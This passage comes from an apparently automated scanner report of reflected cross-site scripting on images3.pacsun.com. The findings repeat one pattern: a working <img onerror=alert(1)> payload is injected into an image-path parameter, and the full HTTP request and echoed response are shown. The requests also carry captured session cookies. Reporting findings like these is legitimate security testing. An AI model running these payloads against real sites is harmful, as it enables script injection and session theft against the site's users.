Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo014c5e3e<img src=a onerror=alert(1)>af792a1d8d2

3.38. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo015

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0add<img%20src%3da%20onerror%3dalert(1)>3a458bffe10 was submitted in the REST URL parameter 4. This input was echoed as c0add<img src=a onerror=alert(1)>3a458bffe10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo015c0add<img%20src%3da%20onerror%3dalert(1)>3a458bffe10?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/brand_logo015c0add<img src=a onerror=alert(1)>3a458bffe10

3.39. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo016

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eddcd<img%20src%3da%20onerror%3dalert(1)>36a4f7cabf5 was submitted in the REST URL parameter 4. This input was echoed as eddcd<img src=a onerror=alert(1)>36a4f7cabf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo016eddcd<img%20src%3da%20onerror%3dalert(1)>36a4f7cabf5?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/brand_logo016eddcd<img src=a onerror=alert(1)>36a4f7cabf5

3.40. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo017

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7c78<img%20src%3da%20onerror%3dalert(1)>f21d66732f0 was submitted in the REST URL parameter 4. This input was echoed as d7c78<img src=a onerror=alert(1)>f21d66732f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo017d7c78<img%20src%3da%20onerror%3dalert(1)>f21d66732f0?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/brand_logo017d7c78<img src=a onerror=alert(1)>f21d66732f0

3.41. http://images3.pacsun.com/is/image/pacsun/brand_logo037 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo037

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d290<img%20src%3da%20onerror%3dalert(1)>5ddd19d0da2 was submitted in the REST URL parameter 4. This input was echoed as 2d290<img src=a onerror=alert(1)>5ddd19d0da2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo0372d290<img%20src%3da%20onerror%3dalert(1)>5ddd19d0da2?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/brand_logo0372d290<img src=a onerror=alert(1)>5ddd19d0da2

3.42. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btnASmallV3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1998<img%20src%3da%20onerror%3dalert(1)>528b4e0b9e5 was submitted in the REST URL parameter 4. This input was echoed as d1998<img src=a onerror=alert(1)>528b4e0b9e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btnASmallV3d1998<img%20src%3da%20onerror%3dalert(1)>528b4e0b9e5?$img_gif$&$txt=GET+PACMAIL&$layer_0_src=PacSunV2%2Fbtn_130x28&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 78
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:09 GMT
Connection: close

Unable to find /pacsun/btnASmallV3d1998<img src=a onerror=alert(1)>528b4e0b9e5

3.43. http://images3.pacsun.com/is/image/pacsun/btn_myBag_v3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_myBag_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 474f1<img%20src%3da%20onerror%3dalert(1)>5ce3405dd8e was submitted in the REST URL parameter 4. This input was echoed as 474f1<img src=a onerror=alert(1)>5ce3405dd8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_myBag_v3474f1<img%20src%3da%20onerror%3dalert(1)>5ce3405dd8e?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 79
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/btn_myBag_v3474f1<img src=a onerror=alert(1)>5ce3405dd8e

3.44. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5728<img%20src%3da%20onerror%3dalert(1)>b0a30417ea6 was submitted in the REST URL parameter 4. This input was echoed as d5728<img src=a onerror=alert(1)>b0a30417ea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_searchGo_v2d5728<img%20src%3da%20onerror%3dalert(1)>b0a30417ea6?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v2d5728<img src=a onerror=alert(1)>b0a30417ea6

3.45. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a76eb<img%20src%3da%20onerror%3dalert(1)>4c782d0a103 was submitted in the REST URL parameter 4. This input was echoed as a76eb<img src=a onerror=alert(1)>4c782d0a103 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_searchGo_v3a76eb<img%20src%3da%20onerror%3dalert(1)>4c782d0a103?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v3a76eb<img src=a onerror=alert(1)>4c782d0a103

3.46. http://images3.pacsun.com/is/image/pacsun/denimMega_071311 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/denimMega_071311

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 289bb<img%20src%3da%20onerror%3dalert(1)>26baf769630 was submitted in the REST URL parameter 4. This input was echoed as 289bb<img src=a onerror=alert(1)>26baf769630 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/denimMega_071311289bb<img%20src%3da%20onerror%3dalert(1)>26baf769630?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/denimMega_071311289bb<img src=a onerror=alert(1)>26baf769630

3.47. http://images3.pacsun.com/is/image/pacsun/detailLogo_011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de255<img%20src%3da%20onerror%3dalert(1)>c346dbd6552 was submitted in the REST URL parameter 4. This input was echoed as de255<img src=a onerror=alert(1)>c346dbd6552 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_011de255<img%20src%3da%20onerror%3dalert(1)>c346dbd6552?$img_gif$&hei=20&wid=93&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_011de255<img src=a onerror=alert(1)>c346dbd6552

3.48. http://images3.pacsun.com/is/image/pacsun/detailLogo_071 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_071

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c283f<img%20src%3da%20onerror%3dalert(1)>36eb41daa77 was submitted in the REST URL parameter 4. This input was echoed as c283f<img src=a onerror=alert(1)>36eb41daa77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_071c283f<img%20src%3da%20onerror%3dalert(1)>36eb41daa77?$img_gif$&hei=20&wid=90&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_071c283f<img src=a onerror=alert(1)>36eb41daa77

3.49. http://images3.pacsun.com/is/image/pacsun/detailLogo_101 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_101

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c6ee0<img%20src%3da%20onerror%3dalert(1)>eee01c75e51 was submitted in the REST URL parameter 4. This input was echoed as c6ee0<img src=a onerror=alert(1)>eee01c75e51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_101c6ee0<img%20src%3da%20onerror%3dalert(1)>eee01c75e51?$img_gif$&hei=20&wid=112&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_101c6ee0<img src=a onerror=alert(1)>eee01c75e51

3.50. http://images3.pacsun.com/is/image/pacsun/detailLogo_161 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_161

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42fb2<img%20src%3da%20onerror%3dalert(1)>9bfa309cd73 was submitted in the REST URL parameter 4. This input was echoed as 42fb2<img src=a onerror=alert(1)>9bfa309cd73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_16142fb2<img%20src%3da%20onerror%3dalert(1)>9bfa309cd73?$img_gif$&hei=20&wid=77&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_16142fb2<img src=a onerror=alert(1)>9bfa309cd73

3.51. http://images3.pacsun.com/is/image/pacsun/detailLogo_181 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_181

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5af61<img%20src%3da%20onerror%3dalert(1)>de04cd3978d was submitted in the REST URL parameter 4. This input was echoed as 5af61<img src=a onerror=alert(1)>de04cd3978d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_1815af61<img%20src%3da%20onerror%3dalert(1)>de04cd3978d?$img_gif$&hei=20&wid=58&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:28 GMT
Connection: close

Unable to find /pacsun/detailLogo_1815af61<img src=a onerror=alert(1)>de04cd3978d

3.52. http://images3.pacsun.com/is/image/pacsun/detailLogo_202 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_202

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89278<img%20src%3da%20onerror%3dalert(1)>7f5a74568ac was submitted in the REST URL parameter 4. This input was echoed as 89278<img src=a onerror=alert(1)>7f5a74568ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_20289278<img%20src%3da%20onerror%3dalert(1)>7f5a74568ac?$img_gif$&hei=20&wid=93&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_20289278<img src=a onerror=alert(1)>7f5a74568ac

3.53. http://images3.pacsun.com/is/image/pacsun/detailLogo_231 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_231

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5edba<img%20src%3da%20onerror%3dalert(1)>ef68be70d54 was submitted in the REST URL parameter 4. This input was echoed as 5edba<img src=a onerror=alert(1)>ef68be70d54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2315edba<img%20src%3da%20onerror%3dalert(1)>ef68be70d54?$img_gif$&hei=20&wid=56&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:41 GMT
Connection: close

Unable to find /pacsun/detailLogo_2315edba<img src=a onerror=alert(1)>ef68be70d54

3.54. http://images3.pacsun.com/is/image/pacsun/detailLogo_242 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_242

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3981c<img%20src%3da%20onerror%3dalert(1)>f3c6a27bcdf was submitted in the REST URL parameter 4. This input was echoed as 3981c<img src=a onerror=alert(1)>f3c6a27bcdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2423981c<img%20src%3da%20onerror%3dalert(1)>f3c6a27bcdf?$img_gif$&hei=20&wid=32&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
